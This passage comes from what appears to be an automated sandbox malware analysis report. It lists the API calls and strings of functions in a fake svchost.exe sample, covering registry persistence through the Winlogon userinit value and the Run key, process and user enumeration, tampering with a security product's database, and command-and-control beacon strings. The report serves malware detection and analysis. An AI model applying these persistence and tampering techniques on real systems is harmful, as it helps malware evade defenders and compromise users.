                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C88DF6
                                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88DFD
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C88E06
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(02C890E0,00000008,00000040,?,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C88E27
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02C88E46
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02C88E62
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02C88E78
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02C88E86
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88E91
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02C88EA4
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02C88EB5
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02C88EC4
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02C88ED3
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02C88EE2
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000006,?), ref: 02C88EEA
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02C88EFD
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02C88F0E
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02C88F1D
                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88F29
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02C88F33
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C88F3B
                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 02C88F42
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C88F7E
                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2984368831-0
                                                                                                                                                                                                                    • Opcode ID: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
                                                                                                                                                                                                                    • Instruction ID: f67128f16ff17653a9e34e1d7b9161699e35eac166b0b198bcee514057c584d9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13517371941219EFE711AF74CC46FAE77ACFF49310F154928F986E3180DB3899518BA0
                                                                                                                                                                                                                    Function 004020B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040222A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                    • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                    • API String ID: 33631002-3172865025
                                                                                                                                                                                                                    • Opcode ID: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                                    • Instruction ID: e7d083a3d342eb0d1741576d2c48f75b21a67eac2e30cb69abab2c03069a185e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 384184B0D01358DEEB20CF959988BDEFEB5BB04308F5081AED5186B281C7B90A89CF55
                                                                                                                                                                                                                    Function 02C743E0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 199memoryprocessCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C74413
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,762335B0,00000000), ref: 02C7441E
                                                                                                                                                                                                                    • Process32First.KERNEL32 ref: 02C74441
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7445D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C74477
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C744B0
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C744B7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C744CB
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02C744FC
                                                                                                                                                                                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02C74513
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7457C
                                                                                                                                                                                                                    • Process32Next.KERNEL32(?,?), ref: 02C7458B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
                                                                                                                                                                                                                    • String ID: %d%s$[System Process]$taskmgr{PIDProcess name
                                                                                                                                                                                                                    • API String ID: 3808533164-4214784430
                                                                                                                                                                                                                    • Opcode ID: d5d3fb5d249bcd83fd116b4f2903be2a5c7312a70a5c95f9b7e6c20cb0017866
                                                                                                                                                                                                                    • Instruction ID: a58d1df14372a35efa8db0775b27ced9be746b89a85be76ce4bc9d0dd6485024
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5d3fb5d249bcd83fd116b4f2903be2a5c7312a70a5c95f9b7e6c20cb0017866
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5661E171A44381AFD326DB24D848FA7BBF9EFC4704F048A58F89587240E770D608CBA2
                                                                                                                                                                                                                    Function 02C759E0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 204stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$strstrstrtol
                                                                                                                                                                                                                    • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                                    • API String ID: 600650289-3097137778
                                                                                                                                                                                                                    • Opcode ID: fc2807ee961e9a133faa56c9e298ffd15ae3ba6a2ea2150a52904871b0101bd3
                                                                                                                                                                                                                    • Instruction ID: da856dfcd850f2cb1d291f491d62d00feefe61db9d72616daca149179db0e07f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc2807ee961e9a133faa56c9e298ffd15ae3ba6a2ea2150a52904871b0101bd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7719E71E482599BDB26CB78AC90BDEBBB5EF48300F0445E8ED49E3281D3705B45CBA1
                                                                                                                                                                                                                    Function 02C88C60 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 111filethreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C88C7A
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C88C87
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02C88CA4
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000188F0,?,00000000,00000000), ref: 02C88CED
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C88D05
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C88D16
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 02C88D28
                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C88D40
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C88D60
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C88DAA
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C88DB7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • name=%s&port=%u, xrefs: 02C88D4F
                                                                                                                                                                                                                    • %45%4E%47%49%4E%45%45%52%21%32%32%36%35%33%33%21%31%43%45%33%41%41%44%31, xrefs: 02C88D4A
                                                                                                                                                                                                                    • /home.php, xrefs: 02C88D91
                                                                                                                                                                                                                    • SystemDrive, xrefs: 02C88C75
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                                    • String ID: %45%4E%47%49%4E%45%45%52%21%32%32%36%35%33%33%21%31%43%45%33%41%41%44%31$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                                    • API String ID: 1291007772-3632277759
                                                                                                                                                                                                                    • Opcode ID: c8c801393c20ce4181e5ce373c2be4160f4b6f058acb619a3269d56a1740c02f
                                                                                                                                                                                                                    • Instruction ID: 19e462e9301785fa3939d799fcd2f6b6f711ed7f5f2997c3c6809450ae5e9672
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8c801393c20ce4181e5ce373c2be4160f4b6f058acb619a3269d56a1740c02f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E419571A80249BFEB15EB60CC49FE9777DEF84704F0086D4B605A7180EBB09B448BA0
                                                                                                                                                                                                                    Function 02C74630 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 158memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,762335B0,00000000,?,?,?,?,02C74FC0,00000000), ref: 02C74677
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746BD
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746C4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C746D7
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7471D
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000), ref: 02C74754
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02C74FC0,02C74FC1,000000EA,00000000), ref: 02C7478C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C7479F
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C747A2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C747AF
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C747B2
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C747C5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FreeProcess$Buffer$AllocDisplayFileInformationQueryValidateWrite_snprintfmemset
                                                                                                                                                                                                                    • String ID: %S$netuser{
                                                                                                                                                                                                                    • API String ID: 639091076-3648794683
                                                                                                                                                                                                                    • Opcode ID: c680fe2a91c26ed435c5a11ecd28dce61d6406146c70b4d7320c46dbff52e3f7
                                                                                                                                                                                                                    • Instruction ID: a09513ab196caa84cab5f38fd2b69e8b71630842e68712c06780eeb64ca6a33b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c680fe2a91c26ed435c5a11ecd28dce61d6406146c70b4d7320c46dbff52e3f7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B51D871E40259ABDF26CFA4DC58BEFBBB9EF85701F144695E804E7244D7309A04CBA1
                                                                                                                                                                                                                    Function 00402420 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402547
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                    • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                    • API String ID: 606440919-2829233815
                                                                                                                                                                                                                    • Opcode ID: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                                    • Instruction ID: da06213ca23f861e298ab990455e1520987101534f77d1697d18ba9606f76a1b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03314871684218BEF311EB90DC96FEA7768EF89B00F104165F304AA1D0DBF16A45CBA9
                                                                                                                                                                                                                    Function 02C73310 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 80registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C73335
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C73361
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73399
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02C733EE
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 02C7341A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • software\microsoft\windows\currentversion\run, xrefs: 02C733E4
                                                                                                                                                                                                                    • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02C733AD
                                                                                                                                                                                                                    • userinit, xrefs: 02C73406
                                                                                                                                                                                                                    • C:\Windows\apppatch\svchost.exe, xrefs: 02C733C4, 02C733FB
                                                                                                                                                                                                                    • SystemDrive, xrefs: 02C7334F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                                    • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                    • API String ID: 3780845138-4271125494
                                                                                                                                                                                                                    • Opcode ID: 6b750813ce8372b554415f7555ee6dfe068380e2f3290fbfdfa6d2ac92d90761
                                                                                                                                                                                                                    • Instruction ID: 77455b1871250831008721f3d0005f1f0931f4f4ce81c7aab28f52af9f795f73
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b750813ce8372b554415f7555ee6dfe068380e2f3290fbfdfa6d2ac92d90761
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56213CB1E80248BBFB15CB90DD4AFEDB77CEB44B00F104598B705A7080D7B4AA44CBA1
                                                                                                                                                                                                                    Function 00402810 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 00402873
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 004028AB
                                                                                                                                                                                                                    • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(00000000), ref: 0040292D
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402937
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • software\microsoft\windows\currentversion\run, xrefs: 004028F0
                                                                                                                                                                                                                    • SystemDrive, xrefs: 00402861
                                                                                                                                                                                                                    • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833
                                                                                                                                                                                                                    • userinit, xrefs: 00402918
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                                    • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                    • API String ID: 3547530944-2324515132
                                                                                                                                                                                                                    • Opcode ID: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
                                                                                                                                                                                                                    • Instruction ID: 580de61d93956de76c260b8cd85b43503f34d02da1fa31da69fbe3ce3aace33d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F3166B5740305BBE720DB909D4AFEA777CDB95B00F208155FB44BA1D0D6F4AA448BA8
                                                                                                                                                                                                                    Function 02C93B50 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C93B76
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76230F00), ref: 02C93B87
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C93B90
                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 02C93B9F
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C93BD9
                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,?), ref: 02C93BFA
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,kernel), ref: 02C93C1C
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.dll), ref: 02C93C28
                                                                                                                                                                                                                    • Module32Next.KERNEL32(00000000,00000224), ref: 02C93C36
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                    • String ID: .dll$kernel
                                                                                                                                                                                                                    • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                    • Opcode ID: 837fe52d8f96531e792efd769e438687a494a964506d8d084a00e4bcb74075a0
                                                                                                                                                                                                                    • Instruction ID: d2d9058f1445d8cf351f5a5261efd48de42c6316710ee31e9748862b917e9faa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 837fe52d8f96531e792efd769e438687a494a964506d8d084a00e4bcb74075a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45219971E4155467DB11ABA9AC4CBDEB3ACDF89714F1007D5E905D3180DB30DE458BA1
                                                                                                                                                                                                                    Function 00401C70 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
